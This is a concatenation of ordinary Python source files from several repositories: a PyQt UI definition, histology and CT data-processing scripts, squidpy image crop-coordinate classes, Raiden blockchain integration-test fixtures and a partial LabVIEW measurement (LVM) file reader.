self.label_7 = QtWidgets.QLabel(self.groupBox_autodetect)
self.label_7.setObjectName("label_7")
self.gridLayout_4.addWidget(self.label_7, 1, 2, 1, 1)
self.LabelPixSpace = QtWidgets.QLabel(self.groupBox_autodetect)
self.LabelPixSpace.setObjectName("LabelPixSpace")
self.gridLayout_4.addWidget(self.LabelPixSpace, 2, 0, 1, 3)
self.Button_accptPxSpace = QtWidgets.QPushButton(self.groupBox_autodetect)
self.Button_accptPxSpace.setObjectName("Button_accptPxSpace")
self.gridLayout_4.addWidget(self.Button_accptPxSpace, 3, 0, 1, 3)
self.verticalLayout.addWidget(self.groupBox_autodetect)
self.groupBox = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox.setObjectName("groupBox")
self.gridLayout_3 = QtWidgets.QGridLayout(self.groupBox)
self.gridLayout_3.setObjectName("gridLayout_3")
self.Button_defineROI = QtWidgets.QPushButton(self.groupBox)
self.Button_defineROI.setEnabled(True)
self.Button_defineROI.setCheckable(True)
self.Button_defineROI.setChecked(False)
self.Button_defineROI.setFlat(False)
self.Button_defineROI.setObjectName("Button_defineROI")
self.gridLayout_3.addWidget(self.Button_defineROI, 0, 0, 1, 2)
self.Button_lockEarpin = QtWidgets.QPushButton(self.groupBox)
self.Button_lockEarpin.setEnabled(True)
self.Button_lockEarpin.setObjectName("Button_lockEarpin")
self.gridLayout_3.addWidget(self.Button_lockEarpin, 0, 2, 1, 2)
self.label_9 = QtWidgets.QLabel(self.groupBox)
self.label_9.setObjectName("label_9")
self.gridLayout_3.addWidget(self.label_9, 1, 0, 1, 1)
self.TxtEarpinX = QtWidgets.QDoubleSpinBox(self.groupBox)
self.TxtEarpinX.setDecimals(1)
self.TxtEarpinX.setMaximum(10000.0)
self.TxtEarpinX.setSingleStep(0.1)
self.TxtEarpinX.setObjectName("TxtEarpinX")
self.gridLayout_3.addWidget(self.TxtEarpinX, 1, 1, 1, 1)
self.label_10 = QtWidgets.QLabel(self.groupBox)
self.label_10.setObjectName("label_10")
self.gridLayout_3.addWidget(self.label_10, 1, 2, 1, 1)
self.TxtEarpinY = QtWidgets.QDoubleSpinBox(self.groupBox)
self.TxtEarpinY.setDecimals(1)
self.TxtEarpinY.setMaximum(10000.0)
self.TxtEarpinY.setSingleStep(0.1)
self.TxtEarpinY.setObjectName("TxtEarpinY")
self.gridLayout_3.addWidget(self.TxtEarpinY, 1, 3, 1, 1)
self.verticalLayout.addWidget(self.groupBox)
self.Button_Done = QtWidgets.QPushButton(self.centralwidget)
self.Button_Done.setObjectName("Button_Done")
self.verticalLayout.addWidget(self.Button_Done)
spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem)
self.gridLayout_2.addLayout(self.verticalLayout, 1, 1, 1, 1)
Landmark.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(Landmark)
self.menubar.setGeometry(QtCore.QRect(0, 0, 787, 26))
self.menubar.setObjectName("menubar")
Landmark.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(Landmark)
self.statusbar.setObjectName("statusbar")
Landmark.setStatusBar(self.statusbar)
self.retranslateUi(Landmark)
QtCore.QMetaObject.connectSlotsByName(Landmark)
def retranslateUi(self, Landmark):
_translate = QtCore.QCoreApplication.translate
Landmark.setWindowTitle(_translate("Landmark", "Landmark Definition"))
self.groupBox_2.setTitle(_translate("Landmark", "GroupBox"))
self.Button_LoadLandmark.setText(_translate("Landmark", "Load Landmark Image"))
self.groupBox_autodetect.setTitle(_translate("Landmark", "Pixel Spacing"))
self.label_4.setText(_translate("Landmark", "<html><head/><body><p>Source-Detector: d<span style=\" vertical-align:sub;\">SD </span>=</p></body></html>"))
self.label_6.setText(_translate("Landmark", "cm"))
self.label_5.setText(_translate("Landmark", "<html><head/><body><p>Object-Detector: d<span style=\" vertical-align:sub;\">OD</span> =</p></body></html>"))
self.label_7.setText(_translate("Landmark", "cm"))
self.LabelPixSpace.setText(_translate("Landmark", "Pixel Spacing:"))
self.Button_accptPxSpace.setText(_translate("Landmark", "Lock"))
self.groupBox.setTitle(_translate("Landmark", "Earpin"))
self.Button_defineROI.setText(_translate("Landmark", "Define ROI"))
self.Button_lockEarpin.setText(_translate("Landmark", "Lock"))
self.label_9.setText(_translate("Landmark", "x="))
self.label_10.setText(_translate("Landmark", "y="))
self.Button_Done.setText(_translate("Landmark", "Done"))
from matplotlibwidgetFile import matplotlibWidget
```
#### File: RadiAide/tests/test_radiaidd.py
```python
import RadiAIDD
def test_radiaidd():
a = 1 + 1
assert a == 2
if __name__ == "__main__":
test_radiaidd()
``` |
{
"source": "jo-mueller/Slice2Volume_CodeAndDocs",
"score": 3
} |
#### File: Histology/Scripts/SortHistoSlices.py
```python
import os
import tqdm
from itertools import chain
from shutil import copyfile
import re
def parsename(string):
"Extracts propper dirname from histo filename"
substrings = re.split("-|_|\.", string)
for i in range(len(substrings)):
if substrings[i] == "Scene":
break
SliceNumber = substrings[i-1]
try:
SceneNumber = substrings[i+1]
except IndexError:
print("Script failed here:")
print(substrings)
return "_".join([SliceNumber, "Scene", SceneNumber])
root = "E:/Promotion/Projects/2020_Slice2Volume/Data/"
mouselist = os.listdir(root)
for mouse in mouselist:
print(mouse)
if not mouse == "P2A_C3H_M5":
continue
if not os.path.exists(os.path.join(root, mouse, "Histo")):
continue
print("Sorting data for mouse " + mouse)
dirlist = os.listdir(os.path.join(root, mouse, "Histo"))
histolist = [d for d in dirlist if not "Scene" in d and not d.endswith("czi")]
slicelist = os.listdir(os.path.join(root, mouse, "Histo", histolist[0]))
# make directories
for i in range(len(slicelist)):
if not "Scene" in slicelist[i]:
continue
name = parsename(slicelist[i])
trgpath = os.path.join(root, mouse, "Histo", name)
if not os.path.isdir(trgpath):
os.mkdir(trgpath)
# Now that all folders are created, data to correct location
histolist = [os.path.join(root, mouse, "Histo", x) for x in histolist]
for base, subdirs, files in chain.from_iterable(os.walk(x) for x in histolist):
# Skip empty directories
if len(files) == 0:
continue
for f in tqdm.tqdm(files):
# Skip this blasted file
if f == "Thumbs.db":
continue
parsedname = parsename(f)
# proper file formatting
img_type = (''.join([x[0] for x in os.path.basename(base).split('-')]) +
"_" + os.path.basename(base).replace("-", "_"))
src = os.path.join(base, f)
_f = f.replace('-', '_').split('_')
_f = '_'.join(_f[0:4] + [img_type] + _f[4:])
trg = os.path.join(root, mouse, "Histo", parsedname, _f)
if os.path.exists(trg):
continue
copyfile(src, trg)
```
#### File: Slice2Volume_CodeAndDocs/Simulation/zeropadding.py
```python
import os
import numpy as np
import pydicom as dcm
import tqdm
import random
import tifffile as tf
def read_CT(directory):
"""
Read dcm files from a directory and fuse to array
"""
# get CBCT data
slices = sorted(os.listdir(directory))  # sort so the axial stacking order is deterministic
meta = dcm.read_file(os.path.join(directory, slices[0]))
Array = np.zeros((meta.Rows, meta.Columns, len(slices)))
for i, slc in tqdm.tqdm(enumerate(slices)):
meta = dcm.read_file(os.path.join(directory, slc))
Array[:, :, i] = meta.pixel_array
return Array
"""
BL6:
Maus CTAuswahlMitte CTAuswahlMitte-45 CTAuswahlMitte+45
---- ------------------ ------------------ ------------------
1 98 53 143
2 89 44 134
6 97 52 142
10 97 52 142
C3H:
Maus CTAuswahlMitte CTAuswahlMitte-45 CTAuswahlMitte+45
---- ------------------ ------------------ ------------------
1 122 77 167
3 116 71 161
5 118 73 163
8 130 85 175
10 128 83 173
"""
first = 83 # first simulated axial slice
N_slices = 91 # number of simulated axial slices
if __name__ == '__main__':
root = r"E:\Promotion\Projects\2020_Slice2Volume\Data\P2A_C3H_M10"
CBCT = read_CT(os.path.join(root, "CT"))
Dose = np.zeros_like(CBCT)
LET = np.zeros_like(CBCT)
# Dose first
Doses = []
LETs = []
for base, subdirs, fnames in os.walk(os.path.join(root, "Simulation")):
for fname in fnames:
if fname.endswith("dcm") and "TotalDose" in fname:
Doses.append(os.path.join(base, fname))
elif fname.endswith("dcm") and "ProtonLET" in fname:
LETs.append(os.path.join(base, fname))
# Pick 10 out of the >10 statistically independent experiment runs
Doses = random.sample(Doses, 10)
LETs = random.sample(LETs, 10)
for i in range(len(Doses)):
meta_LET = dcm.read_file(LETs[i])
meta_dose = dcm.read_file(Doses[i])
meta_LET = np.einsum('ijk -> jki', meta_LET.pixel_array) * float(meta_LET.DoseGridScaling)
meta_dose = np.einsum('ijk -> jki', meta_dose.pixel_array) * float(meta_dose.DoseGridScaling)
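# 'ijk -> jki' moves pydicom's leading frame axis to the back so the dose/LET
# grids share the (rows, columns, slices) layout of the CBCT array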
Dose[:, :, first:first+N_slices] += meta_dose
LET[:, :, first:first+N_slices] += meta_LET
# Average LET
LET = LET/len(LETs)  # average over the number of sampled runs (len(LET) would be the array's first axis)
Dose = (Dose - np.min(Dose))/(Dose.max() - Dose.min())
tf.imwrite(os.path.join(root, "Simulation", "Dose.tif"), data=np.einsum('jki -> ijk', Dose))
tf.imwrite(os.path.join(root, "Simulation", "LET.tif"), data=np.einsum('jki -> ijk', LET))
``` |
{
"source": "jo-mueller/squidpy",
"score": 3
} |
#### File: squidpy/im/_coords.py
```python
from __future__ import annotations
from abc import ABC, abstractmethod
from typing import Union # noqa: F401
from typing import Any, Hashable
from dataclasses import dataclass
import numpy as np
from squidpy._utils import NDArrayA
from squidpy.gr._utils import _assert_non_negative
from squidpy._constants._pkg_constants import Key
def _circular_mask(arr: NDArrayA, y: int, x: int, radius: float) -> NDArrayA:
Y, X = np.ogrid[: arr.shape[0], : arr.shape[1]]
return np.asarray(((Y - y) ** 2 + (X - x) ** 2) <= radius**2)
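# Example (illustrative): _circular_mask(np.zeros((5, 5)), y=2, x=2, radius=1)
# is True on the center pixel and its four direct neighbours (a discrete disc).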
class TupleSerializer(ABC): # noqa: D101
@abstractmethod
def to_tuple(self) -> tuple[float, float, float, float]:
"""Return self as a :class:`tuple`."""
@classmethod
def from_tuple(cls, value: tuple[float, float, float, float]) -> TupleSerializer:
"""Create self from a :class:`tuple`."""
return cls(*value) # type: ignore[call-arg]
@property
@abstractmethod
def T(self) -> TupleSerializer:
"""Transpose self.""" # currently unused
def __mul__(self, other: int | float) -> TupleSerializer:
if not isinstance(other, (int, float)):
return NotImplemented
a, b, c, d = self.to_tuple()
res = type(self)(a * other, b * other, c * other, d * other) # type: ignore[call-arg]
return res
def __rmul__(self, other: int | float) -> TupleSerializer:
return self * other
@dataclass(frozen=True)
class CropCoords(TupleSerializer):
"""Top-left and bottom right-corners of a crop."""
x0: float
y0: float
x1: float
y1: float
def __post_init__(self) -> None:
if self.x0 > self.x1:
raise ValueError(f"Expected `x0` <= `x1`, found `{self.x0}` > `{self.x1}`.")
if self.y0 > self.y1:
raise ValueError(f"Expected `y0` <= `y1`, found `{self.y0}` > `{self.y1}`.")
@property
def T(self) -> CropCoords:
"""Transpose self."""
return CropCoords(x0=self.y0, y0=self.x0, x1=self.y1, y1=self.x1)
@property
def dx(self) -> float:
"""Width."""
return self.x1 - self.x0
@property
def dy(self) -> float:
"""Height."""
return self.y1 - self.y0
@property
def center_x(self) -> float:
"""Center of height."""
return self.x0 + self.dx / 2.0
@property
def center_y(self) -> float:
"""Width of height."""
return self.x0 + self.dy / 2.0
def to_image_coordinates(self, padding: CropPadding) -> CropCoords:
"""
Convert global image coordinates to local.
Parameters
----------
padding
Padding for which to adjust.
Returns
-------
Padding-adjusted image coordinates.
"""
adj = self + padding
return CropCoords(x0=padding.x_pre, y0=padding.y_pre, x1=adj.dx - padding.x_post, y1=adj.dy - padding.y_post)
@property
def slice(self) -> tuple[slice, slice]: # noqa: A003
"""Return the ``(height, width)`` int slice."""
# has to convert to int, because of scaling, coords can also be floats
return slice(int(self.y0), int(self.y1)), slice(int(self.x0), int(self.x1))
def to_tuple(self) -> tuple[float, float, float, float]:
"""Return self as a :class:`tuple`."""
return self.x0, self.y0, self.x1, self.y1
def __add__(self, other: CropPadding) -> CropCoords:
if not isinstance(other, CropPadding):
return NotImplemented
return CropCoords(
x0=self.x0 - other.x_pre, y0=self.y0 - other.y_pre, x1=self.x1 + other.x_post, y1=self.y1 + other.y_post
)
def __sub__(self, other: CropCoords) -> CropPadding:
if not isinstance(other, CropCoords):
return NotImplemented
return CropPadding(
x_pre=abs(self.x0 - other.x0),
y_pre=abs(self.y0 - other.y0),
x_post=abs(self.x1 - other.x1),
y_post=abs(self.y1 - other.y1),
)
@dataclass(frozen=True)
class CropPadding(TupleSerializer):
"""Padding of a crop."""
x_pre: float
x_post: float
y_pre: float
y_post: float
def __post_init__(self) -> None:
_assert_non_negative(self.x_pre, name="x_pre")
_assert_non_negative(self.y_pre, name="y_pre")
_assert_non_negative(self.x_post, name="x_post")
_assert_non_negative(self.y_post, name="y_post")
@property
def T(self) -> CropPadding:
"""Transpose self."""
return CropPadding(x_pre=self.y_pre, y_pre=self.x_pre, x_post=self.y_post, y_post=self.x_post)
def to_tuple(self) -> tuple[float, float, float, float]:
"""Return self as a :class:`tuple`."""
return self.x_pre, self.x_post, self.y_pre, self.y_post
_NULL_COORDS = CropCoords(0, 0, 0, 0)
_NULL_PADDING = CropPadding(0, 0, 0, 0)
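# Usage sketch (illustrative values): padding expands a crop, and subtracting
# the original crop from the padded one recovers the padding:
# crop = CropCoords(x0=10, y0=10, x1=50, y1=50)
# pad = CropPadding(x_pre=5, x_post=5, y_pre=5, y_post=5)
# assert (crop + pad) - crop == pad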
# functions for updating attributes with new scaling, CropCoords, CropPadding
def _update_attrs_coords(attrs: dict[Hashable, Any], coords: CropCoords) -> dict[Hashable, Any]:
old_coords = attrs.get(Key.img.coords, _NULL_COORDS)
if old_coords != _NULL_COORDS:
new_coords = CropCoords(
x0=old_coords.x0 + coords.x0,
y0=old_coords.y0 + coords.y0,
x1=old_coords.x0 + coords.x1,
y1=old_coords.y0 + coords.y1,
)
attrs[Key.img.coords] = new_coords
else:
attrs[Key.img.coords] = coords
return attrs
def _update_attrs_scale(attrs: dict[Hashable, Any], scale: int | float) -> dict[Hashable, Any]:
old_scale = attrs[Key.img.scale]
attrs[Key.img.scale] = old_scale * scale
attrs[Key.img.padding] = attrs[Key.img.padding] * scale
attrs[Key.img.coords] = attrs[Key.img.coords] * scale
return attrs
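# Example (illustrative): after downscaling an image by a factor of 0.5,
# _update_attrs_scale(attrs, 0.5) halves the stored scale, padding and crop
# coordinates so the attributes stay consistent with the resized data.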
``` |
{
"source": "jomuel/raiden",
"score": 2
} |
#### File: integration/cli/conftest.py
```python
import os
import sys
from copy import copy
from tempfile import mkdtemp
import pexpect
import pytest
from raiden.constants import Environment, EthClient
from raiden.settings import RAIDEN_CONTRACT_VERSION
from raiden.tests.utils.ci import get_artifacts_storage
from raiden.tests.utils.smoketest import setup_raiden, setup_testchain
from raiden.utils.typing import Any, ContextManager, Dict
@pytest.fixture(scope="module")
def cli_tests_contracts_version():
return RAIDEN_CONTRACT_VERSION
@pytest.fixture(scope="module")
def raiden_testchain(blockchain_type, port_generator, cli_tests_contracts_version):
import time
start_time = time.monotonic()
eth_client = EthClient(blockchain_type)
# The private chain data is always discarded on the CI
tmpdir = mkdtemp()
base_datadir = str(tmpdir)
# Save the Ethereum node's logs, if needed for debugging
base_logdir = os.path.join(get_artifacts_storage() or str(tmpdir), blockchain_type)
os.makedirs(base_logdir, exist_ok=True)
testchain_manager: ContextManager[Dict[str, Any]] = setup_testchain(
eth_client=eth_client,
free_port_generator=port_generator,
base_datadir=base_datadir,
base_logdir=base_logdir,
)
with testchain_manager as testchain:
result = setup_raiden(
transport="matrix",
matrix_server="auto",
print_step=lambda x: None,
contracts_version=cli_tests_contracts_version,
eth_client=testchain["eth_client"],
eth_rpc_endpoint=testchain["eth_rpc_endpoint"],
web3=testchain["web3"],
base_datadir=testchain["base_datadir"],
keystore=testchain["keystore"],
)
result["ethereum_nodes"] = testchain["node_executors"]
args = result["args"]
# The setup of the testchain returns a TextIOWrapper but
# for the tests we need a filename
args["password_file"] = args["password_file"].name
print("setup_raiden took", time.monotonic() - start_time)
yield args
@pytest.fixture()
def removed_args():
return None
@pytest.fixture()
def changed_args():
return None
@pytest.fixture()
def cli_args(logs_storage, raiden_testchain, removed_args, changed_args, environment_type):
initial_args = raiden_testchain.copy()
if removed_args is not None:
for arg in removed_args:
if arg in initial_args:
del initial_args[arg]
if changed_args is not None:
for k, v in changed_args.items():
initial_args[k] = v
# This assumes that there is only one Raiden instance per CLI test
base_logfile = os.path.join(logs_storage, "raiden_nodes", "cli_test.log")
os.makedirs(os.path.dirname(base_logfile), exist_ok=True)
args = [
"--gas-price",
"1000000000",
"--no-sync-check",
f"--debug-logfile-path={base_logfile}",
"--routing-mode",
"local",
]
if environment_type == Environment.DEVELOPMENT.value:
args += ["--environment-type", environment_type]
for arg_name, arg_value in initial_args.items():
if arg_name == "sync_check":
# Special case
continue
arg_name_cli = "--" + arg_name.replace("_", "-")
if arg_name_cli not in args:
args.append(arg_name_cli)
if arg_value is not None:
args.append(arg_value)
return args
@pytest.fixture
def raiden_spawner(tmp_path, request):
def spawn_raiden(args):
# Remove any possibly defined `RAIDEN_*` environment variables from outer scope
new_env = {k: copy(v) for k, v in os.environ.items() if not k.startswith("RAIDEN")}
new_env["HOME"] = str(tmp_path)
child = pexpect.spawn(
sys.executable,
["-m", "raiden"] + args,
logfile=sys.stdout,
encoding="utf-8",
env=new_env,
timeout=None,
)
request.addfinalizer(child.close)
return child
return spawn_raiden
```
#### File: integration/fixtures/blockchain.py
```python
import os
import pytest
from web3 import HTTPProvider, Web3
from raiden.constants import GENESIS_BLOCK_NUMBER, EthClient
from raiden.network.proxies.proxy_manager import ProxyManager, ProxyManagerMetadata
from raiden.network.rpc.client import JSONRPCClient
from raiden.tests.utils.eth_node import (
AccountDescription,
EthNodeDescription,
GenesisDescription,
run_private_blockchain,
)
from raiden.tests.utils.network import jsonrpc_services
from raiden.tests.utils.tests import cleanup_tasks
from raiden.utils import privatekey_to_address
from raiden.utils.smart_contracts import deploy_contract_web3
from raiden.utils.typing import TokenAddress
from raiden_contracts.constants import CONTRACT_HUMAN_STANDARD_TOKEN
# pylint: disable=redefined-outer-name,too-many-arguments,unused-argument,too-many-locals
@pytest.fixture
def web3(
blockchain_p2p_ports,
blockchain_private_keys,
blockchain_rpc_ports,
blockchain_type,
blockchain_extra_config,
deploy_key,
private_keys,
account_genesis_eth_balance,
random_marker,
request,
tmpdir,
chain_id,
logs_storage,
):
""" Starts a private chain with accounts funded. """
# include the deploy key in the list of funded accounts
keys_to_fund = sorted(set(private_keys + [deploy_key]))
if blockchain_type not in {client.value for client in EthClient}:
raise ValueError(f"unknown blockchain_type {blockchain_type}")
host = "127.0.0.1"
rpc_port = blockchain_rpc_ports[0]
endpoint = f"http://{host}:{rpc_port}"
web3 = Web3(HTTPProvider(endpoint))
assert len(blockchain_private_keys) == len(blockchain_rpc_ports)
assert len(blockchain_private_keys) == len(blockchain_p2p_ports)
eth_nodes = [
EthNodeDescription(
private_key=key,
rpc_port=rpc,
p2p_port=p2p,
miner=(pos == 0),
extra_config=blockchain_extra_config,
blockchain_type=blockchain_type,
)
for pos, (key, rpc, p2p) in enumerate(
zip(blockchain_private_keys, blockchain_rpc_ports, blockchain_p2p_ports)
)
]
accounts_to_fund = [
AccountDescription(privatekey_to_address(key), account_genesis_eth_balance)
for key in keys_to_fund
]
# The private chain data is always discarded on the CI
base_datadir = str(tmpdir)
# Save the Ethereum node's log for debugging
base_logdir = os.path.join(logs_storage, blockchain_type)
genesis_description = GenesisDescription(
prefunded_accounts=accounts_to_fund, chain_id=chain_id, random_marker=random_marker
)
eth_node_runner = run_private_blockchain(
web3=web3,
eth_nodes=eth_nodes,
base_datadir=base_datadir,
log_dir=base_logdir,
verbosity="info",
genesis_description=genesis_description,
)
with eth_node_runner:
yield web3
cleanup_tasks()
@pytest.fixture
def deploy_client(blockchain_rpc_ports, deploy_key, web3, blockchain_type):
if blockchain_type == "parity":
return JSONRPCClient(web3, deploy_key, gas_estimate_correction=lambda gas: 2 * gas)
return JSONRPCClient(web3, deploy_key)
@pytest.fixture
def proxy_manager(deploy_key, deploy_client, contract_manager):
return ProxyManager(
rpc_client=deploy_client,
contract_manager=contract_manager,
metadata=ProxyManagerMetadata(
token_network_registry_deployed_at=GENESIS_BLOCK_NUMBER,
filters_start_at=GENESIS_BLOCK_NUMBER,
),
)
@pytest.fixture
def blockchain_services(
proxy_manager,
private_keys,
secret_registry_address,
service_registry_address,
token_network_registry_address,
web3,
contract_manager,
):
return jsonrpc_services(
proxy_manager=proxy_manager,
private_keys=private_keys,
secret_registry_address=secret_registry_address,
service_registry_address=service_registry_address,
token_network_registry_address=token_network_registry_address,
web3=web3,
contract_manager=contract_manager,
)
@pytest.fixture
def unregistered_token(token_amount, deploy_client, contract_manager) -> TokenAddress:
return TokenAddress(
deploy_contract_web3(
CONTRACT_HUMAN_STANDARD_TOKEN,
deploy_client,
contract_manager=contract_manager,
constructor_arguments=(token_amount, 2, "raiden", "Rd"),
)
)
```
#### File: integration/fixtures/raiden_network.py
```python
import os
import subprocess
import gevent
import pytest
from raiden.app import App
from raiden.constants import GENESIS_BLOCK_NUMBER, Environment, RoutingMode
from raiden.tests.utils.network import (
CHAIN,
BlockchainServices,
create_all_channels_for_network,
create_apps,
create_network_channels,
create_sequential_channels,
parallel_start_apps,
wait_for_alarm_start,
wait_for_channels,
wait_for_token_networks,
)
from raiden.tests.utils.tests import shutdown_apps_and_cleanup_tasks
from raiden.tests.utils.transport import ParsedURL
from raiden.utils.typing import (
Address,
BlockTimeout,
ChainID,
Iterable,
List,
Optional,
TokenAddress,
TokenAmount,
TokenNetworkRegistryAddress,
)
def timeout(blockchain_type: str) -> float:
"""As parity nodes are slower, we need to set a longer timeout when
waiting for onchain events to complete."""
return 120 if blockchain_type == "parity" else 30
@pytest.fixture
def routing_mode():
return RoutingMode.PRIVATE
@pytest.fixture
def raiden_chain(
token_addresses: List[TokenAddress],
token_network_registry_address: TokenNetworkRegistryAddress,
one_to_n_address: Address,
channels_per_node: int,
deposit: TokenAmount,
settle_timeout: BlockTimeout,
chain_id: ChainID,
blockchain_services: BlockchainServices,
reveal_timeout: BlockTimeout,
retry_interval: float,
retries_before_backoff: int,
environment_type: Environment,
unrecoverable_error_should_crash: bool,
local_matrix_servers: List[ParsedURL],
blockchain_type: str,
contracts_path: str,
user_deposit_address: Address,
monitoring_service_contract_address: Address,
broadcast_rooms: List[str],
logs_storage: str,
routing_mode: RoutingMode,
blockchain_query_interval: float,
resolver_ports: List[Optional[int]],
) -> Iterable[List[App]]:
if len(token_addresses) != 1:
raise ValueError("raiden_chain only works with a single token")
assert channels_per_node in (0, 1, 2, CHAIN), (
"deployed_network uses create_sequential_network that can only work "
"with 0, 1 or 2 channels"
)
base_datadir = os.path.join(logs_storage, "raiden_nodes")
service_registry_address: Optional[Address] = None
if blockchain_services.service_registry:
service_registry_address = blockchain_services.service_registry.address
raiden_apps = create_apps(
chain_id=chain_id,
blockchain_services=blockchain_services.blockchain_services,
token_network_registry_address=token_network_registry_address,
one_to_n_address=one_to_n_address,
secret_registry_address=blockchain_services.secret_registry.address,
service_registry_address=service_registry_address,
user_deposit_address=user_deposit_address,
monitoring_service_contract_address=monitoring_service_contract_address,
reveal_timeout=reveal_timeout,
settle_timeout=settle_timeout,
database_basedir=base_datadir,
retry_interval=retry_interval,
retries_before_backoff=retries_before_backoff,
environment_type=environment_type,
unrecoverable_error_should_crash=unrecoverable_error_should_crash,
local_matrix_url=local_matrix_servers[0],
contracts_path=contracts_path,
broadcast_rooms=broadcast_rooms,
routing_mode=routing_mode,
blockchain_query_interval=blockchain_query_interval,
resolver_ports=resolver_ports,
)
confirmed_block = raiden_apps[0].raiden.confirmation_blocks + 1
blockchain_services.proxy_manager.wait_until_block(target_block_number=confirmed_block)
parallel_start_apps(raiden_apps)
from_block = GENESIS_BLOCK_NUMBER
for app in raiden_apps:
app.raiden.install_all_blockchain_filters(
app.raiden.default_registry, app.raiden.default_secret_registry, from_block
)
exception = RuntimeError("`raiden_chain` fixture setup failed, token networks unavailable")
with gevent.Timeout(seconds=timeout(blockchain_type), exception=exception):
wait_for_token_networks(
raiden_apps=raiden_apps,
token_network_registry_address=token_network_registry_address,
token_addresses=token_addresses,
)
app_channels = create_sequential_channels(raiden_apps, channels_per_node)
create_all_channels_for_network(
app_channels=app_channels,
token_addresses=token_addresses,
channel_individual_deposit=deposit,
channel_settle_timeout=settle_timeout,
)
exception = RuntimeError("`raiden_chain` fixture setup failed, nodes are unreachable")
with gevent.Timeout(seconds=timeout(blockchain_type), exception=exception):
wait_for_channels(
app_channels=app_channels,
token_network_registry_address=blockchain_services.deploy_registry.address,
token_addresses=token_addresses,
deposit=deposit,
)
yield raiden_apps
shutdown_apps_and_cleanup_tasks(raiden_apps)
@pytest.fixture
def monitoring_service_contract_address() -> Address:
return Address(bytes([1] * 20))
@pytest.fixture
def resolvers(resolver_ports):
"""Invoke resolver process for each node having a resolver port
By default, Raiden nodes start without hash resolvers (all ports are None)
"""
resolvers = []
for port in resolver_ports:
resolver = None
if port is not None:
args = ["python", "tools/dummy_resolver_server.py", str(port)]
resolver = subprocess.Popen(args, stdout=subprocess.PIPE)
assert resolver.poll() is None
resolvers.append(resolver)
yield resolvers
for resolver in resolvers:
if resolver is not None:
resolver.terminate()
@pytest.fixture
def raiden_network(
token_addresses: List[TokenAddress],
token_network_registry_address: TokenNetworkRegistryAddress,
one_to_n_address: Address,
channels_per_node: int,
deposit: TokenAmount,
settle_timeout: BlockTimeout,
chain_id: ChainID,
blockchain_services: BlockchainServices,
reveal_timeout: BlockTimeout,
retry_interval: float,
retries_before_backoff: int,
environment_type: Environment,
unrecoverable_error_should_crash: bool,
local_matrix_servers: List[ParsedURL],
blockchain_type: str,
contracts_path: str,
user_deposit_address: Address,
monitoring_service_contract_address: Address,
broadcast_rooms: List[str],
logs_storage: str,
start_raiden_apps: bool,
routing_mode: RoutingMode,
blockchain_query_interval: float,
resolver_ports: List[Optional[int]],
) -> Iterable[List[App]]:
service_registry_address = None
if blockchain_services.service_registry:
service_registry_address = blockchain_services.service_registry.address
base_datadir = os.path.join(logs_storage, "raiden_nodes")
raiden_apps = create_apps(
chain_id=chain_id,
contracts_path=contracts_path,
blockchain_services=blockchain_services.blockchain_services,
token_network_registry_address=token_network_registry_address,
secret_registry_address=blockchain_services.secret_registry.address,
service_registry_address=service_registry_address,
one_to_n_address=one_to_n_address,
user_deposit_address=user_deposit_address,
monitoring_service_contract_address=monitoring_service_contract_address,
reveal_timeout=reveal_timeout,
settle_timeout=settle_timeout,
database_basedir=base_datadir,
retry_interval=retry_interval,
retries_before_backoff=retries_before_backoff,
environment_type=environment_type,
unrecoverable_error_should_crash=unrecoverable_error_should_crash,
local_matrix_url=local_matrix_servers[0],
broadcast_rooms=broadcast_rooms,
routing_mode=routing_mode,
blockchain_query_interval=blockchain_query_interval,
resolver_ports=resolver_ports,
)
confirmed_block = raiden_apps[0].raiden.confirmation_blocks + 1
blockchain_services.proxy_manager.wait_until_block(target_block_number=confirmed_block)
if start_raiden_apps:
parallel_start_apps(raiden_apps)
exception = RuntimeError("`raiden_chain` fixture setup failed, token networks unavailable")
with gevent.Timeout(seconds=timeout(blockchain_type), exception=exception):
wait_for_token_networks(
raiden_apps=raiden_apps,
token_network_registry_address=token_network_registry_address,
token_addresses=token_addresses,
)
app_channels = create_network_channels(raiden_apps, channels_per_node)
create_all_channels_for_network(
app_channels=app_channels,
token_addresses=token_addresses,
channel_individual_deposit=deposit,
channel_settle_timeout=settle_timeout,
)
if start_raiden_apps:
exception = RuntimeError("`raiden_network` fixture setup failed, nodes are unreachable")
with gevent.Timeout(seconds=timeout(blockchain_type), exception=exception):
wait_for_channels(
app_channels=app_channels,
token_network_registry_address=blockchain_services.deploy_registry.address,
token_addresses=token_addresses,
deposit=deposit,
)
# Force blocknumber update
exception = RuntimeError("Alarm failed to start and set up start_block correctly")
with gevent.Timeout(seconds=5, exception=exception):
wait_for_alarm_start(raiden_apps)
yield raiden_apps
shutdown_apps_and_cleanup_tasks(raiden_apps)
``` |
{
"source": "jomy92/lvmPlotter-NTNU-Geotech",
"score": 3
} |
#### File: jomy92/lvmPlotter-NTNU-Geotech/readLVM.py
```python
import numpy as np
import re
def readLVM( filepath ):
# Open and read file
with open( filepath ,'r') as f:
lines = f.readlines()
# Define variables
numbering = []
time = []
mode = []
# Store ID given in file
fileID = lines.pop(0)
# Determine buildup of LVM
for val, id in enumerate(lines):
if '*Header*' in id:
numbering.append(val)
elif '*Calibration data' in id:
numbering.append(val)
elif '\n' == id or '\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n' == id:
numbering.append(val)
elif '\t-------\t-------\t-------' in id and val <1000:
numbering.append(val)
elif '\t-------\t-------\t-------' in id and val >1000:
numbering.append(val)
## Divide up LVM file according to buildup
# Normal case
if len(numbering) <= 4:
header = lines[numbering[0]+1:numbering[1]]
calibData = lines[numbering[1]+1:numbering[2]]
columnName = lines[numbering[2]+1:numbering[3]]
data = lines[numbering[3]+1:]
# Convert comma to dot in data
for val, id in enumerate(data):
data[val] = id.replace(",", ".")
for val, id in enumerate(calibData):
calibData[val] = id.replace(",", ".")
# Split string data into lists
fileID = re.split(r'\t+', fileID.rstrip('\n'))
for i in range(len(header)):
header[i] = re.split(r'\t+', header[i].rstrip('\n'))
if 'Depth' in header[i]:
# Convert comma to dot in depth
header[i][1] = header[i][1].replace(",", ".")
for i in range(len(calibData)):
calibData[i] = re.split(r'\t+', calibData[i].rstrip('\n'))
for i in range(len(columnName)):
